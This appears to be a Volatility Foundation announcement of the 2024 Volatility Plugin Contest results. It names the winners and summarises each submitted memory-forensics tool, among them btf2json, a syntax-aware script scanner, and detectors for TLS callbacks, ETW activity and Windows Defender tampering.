Results from the 12th Annual Volatility Plugin Contest are in! We received 6 submissions, from 6 different countries, that included 7 plugins, a Linux profile generation tool, and 9 supporting utilities including an exciting submission from last year’s winner!!
Contest submissions included a range of features and functionality:
- Capability to generate Volatility 3 profiles from BPF Type Format (BTF)
- Plugins to extract semantically validated strings
- Novel techniques for extracting memory resident artifacts and detecting advanced malware capabilities
We would like to thank all participants for their hard work on their submissions and contributions to Volatility community! Independent open-source projects and communities only remain viable because of contributors who are willing to sacrifice their time and resources. Please show your appreciation for the contestants’ contributions by following them on GitHub and social media, providing feedback on their ideas, and helping to improve their code with testing, documentation, or contributing patches.
ACKNOWLEDGEMENTS
We would like to thank Volexity for being a sustaining sponsor of the Volatility Foundation and for contributing to this year’s contest. We would also like to thank the core Volatility developers and the previous winners of the contest who helped review and deliberate the submissions.
Placements and Prizes for the 2024 Volatility Plugin Contest
1st place and $3000 USD cash or One Free Seat at Malware and Memory Forensics Training by the Volatility Team goes to:
Valentin Obst: btf2json
2nd place and $2000 USD cash goes to:
Sylvain Peyrefitte: scrings Plugin
3rd place (tie) and $1000 USD cash goes to:
Kartik N. Iyer and Parag H. Rughani: Thread Local Storage (TLS) Callback Plugin
Shusei Tomonaga: ETW Scanner for Volatility 3
Summary of Submissions
Below is a detailed summary of all submissions, ordered alphabetically by first name. If you have feedback for the participants, we’re sure they’d love to hear your thoughts! As previously mentioned, these developers deserve praise for their amazing work. We look forward to seeing future work by these authors!
Kartik N. Iyer and Parag H. Rughani: Thread Local Storage (TLS) Callback Plugin
TlsCheck is “a specialized plugin designed to detect, analyze and disassemble TLS (Thread Local Storage) callbacks in memory samples. The plugin offers features such as regex-based instruction matching, suspicious instruction detection, YARA-rule signature matching and customizable disassembly options, making it a powerful tool for detecting suspicious behaviors in malware and advanced threats.” The submission also includes a detailed white paper.
Related References:
https://github.com/KartikIyerr/TlsCheck.git
https://attack.mitre.org/techniques/T1055/005/
Rosario Matteo Grammatico:
The Windows Defender Tampering plugin aims to help investigators identify a defense evasion technique that involves disabling or removing features of Microsoft Windows Defender. The plugin provides quick access to the current values in the Windows Defender Registry key and its subkeys to help identify values that have been modified.
Related References:
https://github.com/Gasu16/Volatility3-tampering-plugin
https://attack.mitre.org/techniques/T1562/001/
https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components
https://cloudbrothers.info/en/edr-silencers-exploring-methods-block-edr-communication-part-1/
Shusei Tomonaga: ETW Scanner for Volatility 3
ETW Scan is an open-source Volatility plugin designed to aid security researchers, reverse engineers, and incident responders in leveraging Windows Event Tracing for Windows (ETW) data for enhanced threat hunting and analysis. Built as an investigative tool, ETW Scan extracts and analyzes ETW logs to uncover malicious activity, focusing on the Windows kernel and user-space events. It serves as an invaluable resource for uncovering suspicious activities, particularly in post-compromise situations.
Related References:
https://github.com/JPCERTCC/etw-scan
https://blogs.jpcert.or.jp/en/2024/11/etw_forensics.html
https://github.com/JPCERTCC/etw-scan/blob/main/docs/Event_Tracing_for_Windows_Internals.pdf
https://www.youtube.com/watch?v=l4-CqWWZOxw
https://www.youtube.com/watch?v=IxFSBWS2wkY
Sylvain Peyrefitte: scrings Plugins
This submission provides two Volatility plugins, ScringsScan and VadScringsScan, for syntax-aware scanning for six different languages in kernel memory in Linux, macOS, and Windows, as well as in-process VADs in Windows. Instead of relying on byte-based patterns, the plugins attempt to construct valid syntax trees across scanned memory, and reports when it detects something that appears to be a valid script in the given language. This makes searching for in-memory script payloads easier than having to sift through raw strings output using tools like grep, significantly reducing the signal-to-noise ratio.
Related References:
https://github.com/airbus-cert/scrings/tree/main/volatility
https://tree-sitter.github.io/tree-sitter/
Thomas Clarke: Image Extraction, NSRL Filtering, and Image Classifiers
This submission has a number of components intended to help an investigator extract memory resident images and sort those images using numerous classifiers. For example, it includes utilities for automatically extracting process memory dumps and carving the output with foremost. Another component of the submission includes modifications to the Volatility 3 dumpfiles plugin to check if the extracted files are found in the National Software Reference Library (NSRL). Finally, the submission includes classifiers for data that has been extracted from the aforementioned utilities or files extracted from disk images. This includes sorting files that contain images, quantifying a confidence score related to the file containing Not Suitable for Work (NSFW) material using the Yahoo Open classifier, sorting files found in the NSRL, classifying files based on age and gender, and detecting if a file contains nudity.
Related References:
https://github.com/TDClarke/VOLForemost
https://github.com/TDClarke/VOL3NSRL
https://github.com/TDClarke/saForensics
https://talhassner.github.io/home/publication/2015_CVPR
https://github.com/yahoo/open_nsfw
https://www.nist.gov/itl/ssd/software-quality-group/national-software-reference-library-nsrl/nsrl-download/current-rds
Valentin Obst: btf2json
The btf2json project is a very promising effort to ease the burden of large-scale Linux memory analysis. By incorporating information in the readily available vmlinuz file, analysts can create Volatility 3 symbol tables without the need for a full debug kernel. Through acquisition techniques that incorporate filesystem data, it appears that the final version of this project will enable analysis with only information stored within the memory sample – a large shift from the currently difficult method to gather this information across Linux systems and distributions.
Related References:
https://github.com/vobst/btf2json
https://blog.eb9f.de/2024/11/10/btf2json.html
Resources
Here are some additional resources for previous contests and community-driven plugins:
- Volatility Foundation Contest Page: https://volatilityfoundation.org/contest
- Volatility 3 Community GitHub Repository: https://github.com/volatilityfoundation/community3